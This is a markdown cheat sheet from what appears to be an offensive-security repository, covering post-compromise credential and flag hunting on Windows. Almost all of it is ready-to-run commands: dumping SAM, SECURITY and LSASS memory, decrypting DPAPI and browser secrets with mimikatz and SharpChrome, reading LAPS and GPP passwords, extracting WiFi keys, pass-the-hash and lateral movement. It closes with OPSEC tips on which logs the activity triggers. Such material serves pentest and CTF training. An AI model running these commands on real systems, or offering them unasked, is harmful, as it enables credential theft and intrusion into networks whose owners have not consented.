daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

windows-credential-flag-hunting.md (24281B)


      1 ---
      2 title: "Windows Credential & Flag Hunting"
      3 description: "Find flags, passwords and secrets on Windows — CMD vs PowerShell (Evil-WinRM) syntax, config/registry secrets, PS history, and automated tools."
      4 category: password-attacks
      5 subcategory: "Credential & Flag Hunting"
      6 tags: [windows, powershell, evil-winrm, credentials, flags, post-exploitation, dpapi, mimikatz, laps, gpp, lsass]
      7 tools: [PowerShell, cmd, Evil-WinRM, WinPEAS, Snaffler, LaZagne, mimikatz, SharpDPAPI, SharpChrome, secretsdump, pypykatz, procdump, netexec]
      8 difficulty: intermediate
      9 updated: "2026-09-25"
     10 source: "repo:Password-Attacks/windows-credential-flag-hunting.md"
     11 ---
     12 
     13 # Windows Credential & Flag Hunting
     14 
     15 Post-compromise searching on Windows: find proof flags, then sweep for passwords and secrets. **Which shell you are in decides which syntax works** — this trips people up constantly.
     16 
     17 ---
     18 
     19 ## ⚠️ Read This First — CMD vs PowerShell
     20 
     21 **Evil-WinRM, WinRM, and most modern remote shells drop you into PowerShell, not CMD.** In PowerShell, `dir` and `where` are *aliases* for `Get-ChildItem` and `Where-Object`, so old CMD flags are parsed as arguments and fail:
     22 
     23 ```text
     24 *Evil-WinRM* PS C:\> dir /S /B *user*.txt
     25 A positional parameter cannot be found that accepts argument '*user*.txt'.
     26 *Evil-WinRM* PS C:\> where /R C:\ user.txt
     27 A positional parameter cannot be found that accepts argument 'user.txt'.
     28 ```
     29 
     30 `dir /S /B`, `where /R`, and `findstr /SI` are **CMD-only** — they do not work at a PowerShell prompt. Use one of the two fixes below.
     31 
     32 | Task | CMD (cmd.exe only) | PowerShell (Evil-WinRM) |
     33 |---|---|---|
     34 | Recursive file find | `dir /S /B C:\*user*.txt` | `Get-ChildItem -Path C:\ -Recurse -Filter *user*.txt -ErrorAction SilentlyContinue` |
     35 | Find a named file | `where /R C:\ user.txt` | `Get-ChildItem -Path C:\ -Recurse -Filter user.txt -ErrorAction SilentlyContinue` |
     36 | Grep file contents | `findstr /S /I /M "password" *.xml` | `Get-ChildItem -Recurse -Filter *.xml \| Select-String password` |
     37 
     38 **Escape hatch — run CMD from PowerShell:** if you insist on the CMD one-liners, wrap them:
     39 ```powershell
     40 cmd /c "dir /S /B C:\*user*.txt"
     41 cmd /c "where /R C:\ user.txt"
     42 cmd /c "findstr /S /I /M password C:\*.xml C:\*.ini C:\*.txt"
     43 ```
     44 
     45 > **Note —** `-ErrorAction SilentlyContinue` (short: `-EA 0`) is the PowerShell equivalent of `2>nul` — it hides "Access Denied" noise from directories you cannot read. Without it, a `C:\` recurse is unreadable.
     46 
     47 ---
     48 
     49 ## Phase 1 — Flag Hunting
     50 
     51 ### PowerShell (Evil-WinRM)
     52 ```powershell
     53 # Standard proof files anywhere on C:\
     54 Get-ChildItem -Path C:\ -Recurse -Include user.txt,root.txt,proof.txt,flag*.txt -ErrorAction SilentlyContinue -Force
     55 
     56 # Usual desktops (most HTB/exam boxes)
     57 Get-Content C:\Users\*\Desktop\user.txt -ErrorAction SilentlyContinue
     58 Get-Content C:\Users\Administrator\Desktop\root.txt -ErrorAction SilentlyContinue
     59 
     60 # Anything named like a flag, including hidden files (-Force shows hidden/system)
     61 Get-ChildItem -Path C:\ -Recurse -Filter *flag* -Force -ErrorAction SilentlyContinue
     62 ```
     63 
     64 ### CMD
     65 ```cmd
     66 dir /S /B C:\user.txt C:\root.txt
     67 where /R C:\ user.txt
     68 type C:\Users\Administrator\Desktop\root.txt
     69 ```
     70 
     71 > **Note —** `-Include` needs `-Recurse` (or a wildcard in `-Path`) to take effect. `-Filter` is faster than `-Include` but accepts only one pattern.
     72 
     73 ---
     74 
     75 ## Phase 2 — Finding Files (PowerShell reference)
     76 
     77 ```powershell
     78 # By extension across the whole drive
     79 Get-ChildItem -Path C:\ -Recurse -Include *.kdbx,*.config,*.xml,*.ini,*.txt -EA 0
     80 
     81 # Alias shorthand: gci = Get-ChildItem
     82 gci C:\ -Recurse -Filter *.pem -EA 0 | Select-Object FullName
     83 
     84 # Files changed recently (fresh loot)
     85 gci C:\ -Recurse -EA 0 | Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-1) } | Select FullName,LastWriteTime
     86 
     87 # Only return the path column, not the full table
     88 gci C:\Users -Recurse -Filter *.txt -EA 0 | % { $_.FullName }
     89 ```
     90 
     91 ---
     92 
     93 ## Phase 3 — Grep File Contents (Select-String)
     94 
     95 `Select-String` (alias `sls`) is PowerShell's `grep`/`findstr`:
     96 
     97 ```powershell
     98 # Recurse a tree, search common config types for "password"
     99 Get-ChildItem -Path C:\ -Recurse -Include *.xml,*.ini,*.txt,*.config,*.ps1,*.bat -EA 0 |
    100   Select-String -Pattern 'password|passwd|pwd|secret' -EA 0
    101 
    102 # List only the matching file names (like findstr /M)
    103 gci C:\inetpub,C:\xampp -Recurse -Include *.php,*.config -EA 0 |
    104   Select-String 'password' -List -EA 0 | Select-Object Path
    105 
    106 # Save results to a file
    107 gci C:\ -Recurse -Include *.config,*.xml -EA 0 |
    108   Select-String 'password' -EA 0 | Out-File C:\Windows\Temp\results.txt
    109 ```
    110 
    111 ### CMD equivalent (findstr)
    112 ```cmd
    113 :: /S recurse, /I case-insensitive, /M filenames only, /N line numbers, /P skip binaries
    114 findstr /S /I /M "password" C:\*.xml C:\*.ini C:\*.txt C:\*.config
    115 findstr /S /I /N "password" C:\*.config 2>nul >> results.txt
    116 findstr /S /P /I "password" C:\Users\*.*
    117 ```
    118 
    119 > **Why the original one-liners failed —** `findstr /spin "password" *.*` and `findstr /si password *.xml` only search the **current directory** unless you `cd` first and give real paths, and they are CMD syntax so they error outright in an Evil-WinRM PowerShell prompt. Prefer the `Select-String` versions above.
    120 
    121 ---
    122 
    123 ## Phase 4 — High-Value Locations
    124 
    125 ### Unattended install / provisioning files (classic plaintext creds)
    126 ```powershell
    127 Get-ChildItem -Path C:\ -Recurse -Include Unattend.xml,Unattended.xml,sysprep.xml,sysprep.inf,Autounattend.xml -EA 0
    128 # Common fixed paths:
    129 type C:\Windows\Panther\Unattend.xml 2>$null
    130 type C:\Windows\System32\Sysprep\sysprep.xml 2>$null
    131 # GPP password in SYSVOL (cpassword) — decrypt with gpp-decrypt
    132 gci \\<DC>\SYSVOL -Recurse -Include Groups.xml,Services.xml,ScheduledTasks.xml -EA 0
    133 ```
    134 
    135 ### GPP passwords in SYSVOL (`cpassword`)
    136 
    137 Group Policy Preferences stored local-account passwords as `cpassword` in SYSVOL XML, AES-encrypted with a **public** static key — any authenticated domain user can decrypt them. Complements the `\\<DC>\SYSVOL` find above.
    138 
    139 ```powershell
    140 # On a domain-joined host (PowerSploit) — auto-finds + decrypts all GPP cpasswords
    141 Get-GPPPassword
    142 
    143 # Manual: grep SYSVOL for the encrypted blob
    144 findstr /S /I cPassword \\<domain>\SYSVOL\<domain>\Policies\*.xml
    145 ```
    146 ```bash
    147 # Remote from Linux (no domain join needed)
    148 Get-GPPPassword.py '<domain>/<user>:<pass>@<DC>'
    149 nxc smb <DC> -u <user> -p '<pass>' -M gpp_password
    150 gpp-decrypt '<cpassword_value>'
    151 ```
    152 
    153 > **Note —** MS14-025 blocked *creating* new GPP passwords, but existing ones were never purged. Full walkthrough: /sheets/active-directory/attack-48-gpp-password-decryption
    154 
    155 ### PowerShell & CMD history (very commonly holds passwords)
    156 ```powershell
    157 # PSReadLine history file — per user, survives reboots
    158 Get-Content (Get-PSReadlineOption).HistorySavePath -EA 0
    159 type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    160 # Every user's history
    161 gci C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -EA 0 | % { $_.FullName; gc $_.FullName }
    162 ```
    163 
    164 ### Saved / cached credentials
    165 ```powershell
    166 cmdkey /list                       # stored credentials (use with runas /savecred)
    167 # Web / app config secrets
    168 gci C:\inetpub\wwwroot -Recurse -Include web.config,appsettings.json,*.config -EA 0 | Select-String 'password|connectionString'
    169 type C:\Windows\System32\inetsrv\config\applicationHost.config 2>$null
    170 ```
    171 
    172 ### Windows Credential Manager & Vault
    173 
    174 `cmdkey /list` (above) shows *targets* but never the secret. To enumerate and decrypt the stored blobs:
    175 
    176 ```powershell
    177 # Enumerate stored credentials (targets only — no plaintext returned)
    178 vaultcmd /list
    179 vaultcmd /listcreds:"Windows Credentials" /all
    180 vaultcmd /listcreds:"Web Credentials" /all
    181 
    182 # Web Credentials plaintext for the CURRENT user (WinRT PasswordVault)
    183 [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
    184 $v = New-Object Windows.Security.Credentials.PasswordVault
    185 $v.RetrieveAll() | % { $_.RetrievePassword(); '{0}  {1}  {2}' -f $_.Resource,$_.UserName,$_.Password }
    186 
    187 # Third-party module (needs: Install-Module CredentialManager)
    188 Get-StoredCredential -Target TERMSRV/<host>
    189 (Get-StoredCredential -Target 'git:https://github.com').GetNetworkCredential().Password
    190 ```
    191 ```text
    192 # Decrypt Credential Manager / Vault blobs via DPAPI (current-user context)
    193 SharpDPAPI.exe credentials
    194 SharpDPAPI.exe vaults
    195 ```
    196 
    197 > **Note —** `vaultcmd` lists targets only; the passwords are DPAPI-protected under `%APPDATA%\Microsoft\Credentials\` and `%LOCALAPPDATA%\Microsoft\Credentials\`, decryptable only in the owning user's context or with their masterkey (see DPAPI in Phase 5).
    198 
    199 ### WiFi saved keys (`netsh wlan`)
    200 
    201 ```cmd
    202 netsh wlan show profiles
    203 netsh wlan show profile name="<SSID>" key=clear    :: look for the "Key Content" line
    204 
    205 :: Dump every saved profile's PSK in one pass
    206 for /f "tokens=2 delims=:" %a in ('netsh wlan show profiles ^| findstr "All User Profile"') do @netsh wlan show profile name="%~a" key=clear ^| findstr /C:"SSID name" /C:"Key Content"
    207 ```
    208 ```powershell
    209 netsh wlan show profiles | Select-String ':\s(.+)$' | % {
    210   $ssid = $_.Matches.Groups[1].Value.Trim()
    211   netsh wlan show profile name="$ssid" key=clear | Select-String 'SSID name|Key Content'
    212 }
    213 ```
    214 
    215 > **Note —** `key=clear` needs local admin (or the profile's owning user). Without it the PSK shows as `Present` but redacted.
    216 
    217 ### Registry secrets
    218 ```powershell
    219 # Autologon plaintext password
    220 Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' | Select DefaultUserName,DefaultPassword,DefaultDomainName
    221 # VNC, PuTTY, SNMP, and installer creds
    222 reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s 2>$null
    223 reg query "HKLM\SOFTWARE\RealVNC\vncserver" /v Password 2>$null
    224 reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s 2>$null
    225 # Search entire hives for "password"
    226 reg query HKLM /f password /t REG_SZ /s 2>$null
    227 reg query HKCU /f password /t REG_SZ /s 2>$null
    228 ```
    229 
    230 ### Saved-session managers (PuTTY / WinSCP / RDP)
    231 
    232 ```powershell
    233 # PuTTY — the PROXY password is stored in CLEARTEXT in the registry
    234 reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr /I "HostName UserName ProxyPassword ProxyUsername"
    235 
    236 # WinSCP — sessions in the registry (or WinSCP.ini for portable installs)
    237 reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s
    238 type "$env:APPDATA\WinSCP.ini" 2>$null   # portable installs; installed WinSCP keeps sessions in the registry (above)
    239 ```
    240 ```text
    241 # WinSCP OBFUSCATES (does not encrypt) the password unless a master password is set —
    242 # feed HostName + UserName + the stored Password to a public decoder:
    243 #   msf6 > use post/windows/gather/credentials/winscp     # against a live host
    244 ```
    245 
    246 > **Note —** `.rdp` files (grabbed in the keys/vaults sweep) hold the server + username only; the RDP password is a DPAPI blob in Credential Manager (`cmdkey`), not in the file. A WinSCP session protected with a **master password** cannot be trivially decoded — capture it interactively instead.
    247 
    248 ### Keys, vaults, and databases
    249 ```powershell
    250 gci C:\ -Recurse -Include *.kdbx,*.ppk,*.pem,id_rsa -EA 0        # KeePass / PuTTY / SSH keys
    251 gci C:\Users -Recurse -Include *.rdp -EA 0                        # saved RDP profiles
    252 gci $env:USERPROFILE\.aws\credentials,$env:USERPROFILE\.ssh\* -EA 0
    253 ```
    254 
    255 **Finding KeePass vaults — CMD**
    256 ```cmd
    257 dir /s /b C:\*.kdbx
    258 where /r C:\ *.kdbx
    259 dir /s /b %USERPROFILE%\*.kdbx
    260 ```
    261 
    262 **Finding KeePass vaults — PowerShell**
    263 ```powershell
    264 Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -EA 0
    265 Get-ChildItem -Path C:\Users -Include *.kdbx,*.kdb -File -Recurse -EA 0 |
    266     Select-Object FullName, LastWriteTime
    267 
    268 # KeePass config often leaks the key-file path or an auto-open DB path
    269 Get-ChildItem -Path C:\Users -Include KeePass.config.xml -File -Recurse -EA 0
    270 ```
    271 
    272 **Related artifacts worth grabbing alongside the `.kdbx`**
    273 - `KeePass.config.xml` — may reference a key-file path or an auto-open DB
    274 - `*.key` files near the vault — possible key-file auth component
    275 - Live `KeePass.exe` process — memory can be scraped for the unlocked DB (e.g. `KeePassDumpFull`, or a mimikatz-style memory dump)
    276 - `%APPDATA%\Microsoft\Windows\Recent\` — shortcuts (`.lnk`) that reference a `.kdbx` path even if the vault itself has moved
    277 
    278 **Offline cracking**
    279 ```bash
    280 keepass2john vault.kdbx > hash.txt
    281 john hash.txt
    282 # or: hashcat -m 13400 hash.txt wordlist.txt
    283 ```
    284 
    285 ### LAPS — read managed local-admin password
    286 
    287 If your foothold user can read the LAPS attribute (ACL or delegated group), the managed local-admin password sits in cleartext in AD (`ms-Mcs-AdmPwd` for v1; `msLAPS-Password` / `msLAPS-EncryptedPassword` for v2).
    288 
    289 ```powershell
    290 # Native RSAT / LAPS module
    291 Get-ADComputer <TARGET> -Properties ms-Mcs-AdmPwd | Select Name,ms-Mcs-AdmPwd
    292 Get-LapsADPassword -Identity <TARGET> -AsPlainText          # LAPS v2 module
    293 
    294 # PowerView
    295 Get-DomainComputer <TARGET> -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime
    296 ```
    297 ```bash
    298 # NetExec
    299 nxc ldap <DC> -u <user> -p '<pass>' --module laps
    300 nxc smb  <DC> -u <user> -p '<pass>' --laps
    301 # ldapsearch
    302 ldapsearch -x -H ldap://<DC> -D '<user>@<domain>' -w '<pass>' \
    303   -b 'DC=<dc>,DC=<tld>' '(ms-Mcs-AdmPwd=*)' ms-Mcs-AdmPwd
    304 ```
    305 
    306 > **Note —** LAPS v2 encrypts the password blob (`msLAPS-EncryptedPassword`) — decrypt with `Get-LapsADPassword` or NetExec. Full technique: /sheets/active-directory/attack-72-laps-password-extraction
    307 
    308 ---
    309 
    310 ## Phase 5 — SAM / LSASS / DPAPI (local admin required)
    311 
    312 ```cmd
    313 :: Dump the local SAM + SYSTEM hives, then crack/pass-the-hash offline
    314 reg save HKLM\SAM  C:\Windows\Temp\sam.save
    315 reg save HKLM\SYSTEM C:\Windows\Temp\system.save
    316 :: Exfil, then:  impacket-secretsdump -sam sam.save -system system.save LOCAL
    317 ```
    318 
    319 ```powershell
    320 # LSASS memory dump for mimikatz (Task Manager > lsass > Create dump, or):
    321 rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Windows\Temp\lsass.dmp full
    322 # Then offline:  pypykatz lsa minidump lsass.dmp
    323 ```
    324 
    325 > **Note —** These need local Administrator / SeDebugPrivilege and are noisy (Defender flags LSASS access). For a stealthier route dump remotely with `nxc smb <host> -u u -p p --sam --lsa`.
    326 
    327 ### Full hive triage (SAM + SYSTEM + SECURITY)
    328 
    329 Grab the **SECURITY** hive alongside SAM + SYSTEM — it holds LSA secrets (service-account plaintext, DPAPI machine key, `$MACHINE.ACC`) and cached domain logons (MSCACHEv2 / DCC2).
    330 
    331 ```cmd
    332 reg save HKLM\SAM      C:\Windows\Temp\sam.save
    333 reg save HKLM\SYSTEM   C:\Windows\Temp\system.save
    334 reg save HKLM\SECURITY C:\Windows\Temp\security.save
    335 ```
    336 ```bash
    337 # Offline — local SAM hashes + LSA secrets + cached DCC2 hashes
    338 impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
    339 # Cached domain creds crack as:  hashcat -m 2100 '$DCC2$...' wordlist
    340 ```
    341 
    342 > **Note —** LSA secrets frequently contain service-account **cleartext** passwords (`_SC_<svc>`, `DefaultPassword`); cached logons (`NL$KM` -> DCC2) only crack offline and are slow (`-m 2100`), never pass-the-hash.
    343 
    344 ### LSASS dump alternatives & DPAPI / browser secrets
    345 
    346 ```cmd
    347 :: procdump (Sysinternals, signed) — alternative to the comsvcs.dll MiniDump above
    348 procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp
    349 :: dump by PID if the process name is filtered
    350 procdump64.exe -accepteula -ma <lsass_pid> C:\Windows\Temp\lsass.dmp
    351 ```
    352 ```text
    353 # Parse the dump offline
    354 pypykatz lsa minidump C:\Windows\Temp\lsass.dmp
    355 
    356 # DPAPI masterkeys -> decrypt Credential Manager / Vault / browser blobs (mimikatz)
    357 privilege::debug
    358 sekurlsa::dpapi                                   # cached masterkeys straight from LSASS
    359 dpapi::masterkey /in:%APPDATA%\Microsoft\Protect\<SID>\<GUID> /sid:<SID> /password:<userpw>
    360 dpapi::masterkey /in:<masterkey> /rpc            # or decrypt via the DA domain backup key
    361 dpapi::cred /in:%APPDATA%\Microsoft\Credentials\<GUID>
    362 
    363 # SharpDPAPI — one-shot triage of the current user's DPAPI-protected secrets
    364 SharpDPAPI.exe triage
    365 SharpDPAPI.exe backupkey /nowrap                  # on a DC as Domain Admin -> domain DPAPI key
    366 
    367 # Browser saved logins / cookies (Chrome + Chromium Edge)
    368 SharpChrome.exe logins
    369 SharpChrome.exe cookies
    370 lazagne.exe browsers
    371 ```
    372 
    373 > **Note —** Chrome/Edge **127+** wrap the `Local State` AES key with App-Bound Encryption; offline SharpChrome/LaZagne may return empty for newer profiles — run in the victim's session or use an ABE-aware tool. Browser DBs live at `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data` plus `...\Local State`.
    374 
    375 > **Note —** DPAPI + certificate theft in depth: /sheets/active-directory/theft2-user-certificate-theft-via-dpapi and /sheets/active-directory/mimikatz
    376 
    377 ---
    378 
    379 ## Phase 6 — Automated Tools
    380 
    381 | Tool | Run from | Command |
    382 |---|---|---|
    383 | **WinPEAS** | any shell | `.\winPEASx64.exe` (or `winPEAS.bat` in CMD) |
    384 | **Snaffler** | domain host | `.\Snaffler.exe -s -o snaffler.log` — sweeps shares for creds |
    385 | **LaZagne** | any shell | `.\lazagne.exe all` — browsers, wifi, RDP, DB creds |
    386 | **SharpChrome/SharpDPAPI** | .NET | dump browser + DPAPI secrets |
    387 | **PowerUp** | PowerShell | `. .\PowerUp.ps1; Invoke-AllChecks` |
    388 | **seatbelt** | .NET | `.\Seatbelt.exe -group=all` |
    389 
    390 ```powershell
    391 # Evil-WinRM: upload a tool then run it
    392 # (from the Evil-WinRM prompt)  upload winPEASx64.exe
    393 .\winPEASx64.exe quiet cmd fast
    394 ```
    395 
    396 ---
    397 
    398 ## Phase 7 — Using a Found Password (run a session as another user)
    399 
    400 Once you've recovered a username + password, spawn a shell running as that user instead of just verifying the cred worked.
    401 
    402 ### CMD — `runas`
    403 ```cmd
    404 :: Prompts for the password interactively
    405 runas /user:DOMAIN\targetuser cmd
    406 
    407 :: Local (non-domain) account
    408 runas /user:targetuser cmd
    409 
    410 :: /netonly — use when the account is only valid on a REMOTE box (no local
    411 :: logon rights here); local commands still run as YOU, but anything that
    412 :: hits the network authenticates as targetuser. Avoids a failed local logon.
    413 runas /netonly /user:DOMAIN\targetuser cmd
    414 
    415 :: Reuse a credential CMD already cached (see `cmdkey /list` above)
    416 runas /savecred /user:DOMAIN\targetuser cmd
    417 ```
    418 
    419 ### PowerShell — build a credential object
    420 ```powershell
    421 # Prompts for the password securely (or build SecureString from a known plaintext)
    422 $cred = Get-Credential DOMAIN\targetuser
    423 # Non-interactive, from a known plaintext (lab/CTF use):
    424 $pass = ConvertTo-SecureString 'P@ssw0rd!' -AsPlainText -Force
    425 $cred = New-Object System.Management.Automation.PSCredential('DOMAIN\targetuser', $pass)
    426 
    427 # New process as that user (own console window)
    428 Start-Process powershell -Credential $cred
    429 
    430 # Interactive shell in the CURRENT console (no new window)
    431 $si = New-Object System.Diagnostics.ProcessStartInfo
    432 $si.FileName = 'powershell.exe'
    433 $si.UserName = 'targetuser'; $si.Domain = 'DOMAIN'
    434 $si.Password = $pass
    435 $si.UseShellExecute = $false      # REQUIRED — Start() throws if this is left $true with explicit creds
    436 [System.Diagnostics.Process]::Start($si)
    437 
    438 # Remote session / lateral movement as that user (WinRM must be enabled on target)
    439 Enter-PSSession -ComputerName TARGET -Credential $cred
    440 $s = New-PSSession -ComputerName TARGET -Credential $cred
    441 Invoke-Command -Session $s -ScriptBlock { whoami }
    442 
    443 # Run one command as the user without a full session
    444 Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami /all }
    445 ```
    446 
    447 > **Note —** `runas` and `Start-Process -Credential` need the password (or hash via `/netonly` + `mimikatz sekurlsa::pth`); they don't accept an NTLM hash directly. For hash-only creds, pass-the-hash instead: `impacket-psexec`, `impacket-wmiexec`, or `evil-winrm -i TARGET -u user -H <NTLMhash>`.
    448 
    449 ---
    450 
    451 ## Quick Wins Checklist
    452 
    453 - [ ] `Get-Content (Get-PSReadlineOption).HistorySavePath` — PS history
    454 - [ ] `cmdkey /list` — saved credentials for `runas /savecred`
    455 - [ ] `Unattend.xml` / `sysprep.xml` / `Autounattend.xml`
    456 - [ ] Winlogon `DefaultPassword` autologon
    457 - [ ] `web.config` / `appsettings.json` connection strings
    458 - [ ] SYSVOL `Groups.xml` GPP `cpassword` (→ `gpp-decrypt`)
    459 - [ ] `.kdbx` KeePass, `.ppk`/`id_rsa` keys, `.rdp` profiles
    460 - [ ] `reg query HKLM /f password /t REG_SZ /s`
    461 - [ ] `vaultcmd /list` + `SharpDPAPI.exe credentials` — Credential Manager / Vault secrets
    462 - [ ] `netsh wlan show profile name="<SSID>" key=clear` — saved WiFi PSKs
    463 - [ ] LAPS `ms-Mcs-AdmPwd` read (RSAT / PowerView / `nxc --laps`)
    464 - [ ] SECURITY hive -> LSA secrets + cached domain creds (`secretsdump … -security`)
    465 - [ ] `SharpChrome.exe logins` / `lazagne.exe browsers` — browser saved logins
    466 - [ ] PuTTY `ProxyPassword` (cleartext) / WinSCP saved sessions
    467 
    468 ---
    469 
    470 ## Troubleshooting
    471 
    472 | Problem | Cause & fix |
    473 |---------|-------------|
    474 | `Get-ChildItem -Recurse C:\` throws access-denied noise | Add `-ErrorAction SilentlyContinue`; the walk still returns everything you can read |
    475 | `Select-String` is painfully slow across `C:\` | Constrain it: `-Include *.config,*.xml,*.ps1,*.txt,*.ini` and start from `C:\Users`, `C:\inetpub`, `C:\ProgramData` rather than the drive root |
    476 | `reg query` returns "access denied" on a hive | You need higher rights, or the key is redirected under WOW6432Node — check both `HKLM\SOFTWARE\...` and `HKLM\SOFTWARE\WOW6432Node\...` |
    477 | `findstr /s /i password *` finds nothing on a box you know has creds | `findstr` skips files it cannot open silently; re-run the same sweep from PowerShell `Select-String`, which reports the errors |
    478 | Reading SAM/SECURITY/SYSTEM hives fails while running as admin | The live hives are locked. Copy them from a Volume Shadow Copy, or read them remotely rather than from the live filesystem |
    479 | A recovered hash will not crack | Confirm the format first — NTLM is `-m 1000`, NetNTLMv2 is `-m 5600`, DCC2/`mscash2` is `-m 2100`. A mislabelled mode looks like a wrong password |
    480 | `cmdkey /list` shows entries but you cannot read the secret | `cmdkey` never reveals stored secrets. Use them in place with `runas /savecred`, or extract via DPAPI as the owning user |
    481 | PowerShell history file is empty | `Get-Content (Get-PSReadlineOption).HistorySavePath` — PSReadline logs to `ConsoleHost_history.txt` under `AppData`, per user, and survives logoff |
    482 
    483 ## Detection & OPSEC
    484 
    485 - **Recursive `Get-ChildItem` / `Select-String` over `C:\`** is high-volume file access and is exactly what EDR file-telemetry rules watch for. Scope to the paths that pay off (`C:\Users\*`, `C:\inetpub`, `C:\ProgramData`, `C:\Windows\Panther`).
    486 - **Touching `\Panther\Unattend.xml`, GPP `Groups.xml` on SYSVOL, and the credential vault** maps to MITRE **T1552** (*Unsecured Credentials*). Defenders with SACLs on those paths get an event per read.
    487 - **PowerShell is logged.** Script Block Logging (Event ID **4104**) and transcription capture your one-liners verbatim. `cmd.exe` `findstr` is quieter but still lands in process-creation logs (**4688**) with the full command line if command-line auditing is on.
    488 - **Copying a hive or keystore off-box is louder than reading it in place** — file-write plus network egress. Extract what you need and pull the smallest artifact.
    489 - **`runas /savecred` reuses stored credentials** and generates a logon event (**4624**, logon type 2/9) under the target account; expect it to correlate against your source host.
    490 
    491 ## Related
    492 
    493 * **[Linux Credential & Flag Hunting](/sheets/password-attacks/linux-credential-flag-hunting)** — same job on Linux
    494 * **Kerberoasting** / **AS-REP Roasting** — turn a domain foothold into crackable hashes
    495 * **[Hashcat](/sheets/password-attacks/hashcat)** — crack recovered hashes (`-m 1000` NTLM, `-m 5600` NetNTLMv2)
    496 * **Windows Privilege Escalation** — /sheets/privilege-escalation/windows-privesc
    497 * **Mimikatz** — /sheets/active-directory/mimikatz — DPAPI, LSASS and vault extraction
    498 * **LAPS password extraction** — /sheets/active-directory/attack-72-laps-password-extraction
    499 * **GPP password decryption** — /sheets/active-directory/attack-48-gpp-password-decryption
    500 * **DPAPI certificate theft** — /sheets/active-directory/theft2-user-certificate-theft-via-dpapi
    501 * **NetExec** — /sheets/active-directory/netexec — remote `--sam` / `--lsa` / `--laps` dumping
    502 * **Run as another user from Evil-WinRM** — /sheets/active-directory/run-as-another-user-from-evil-winrm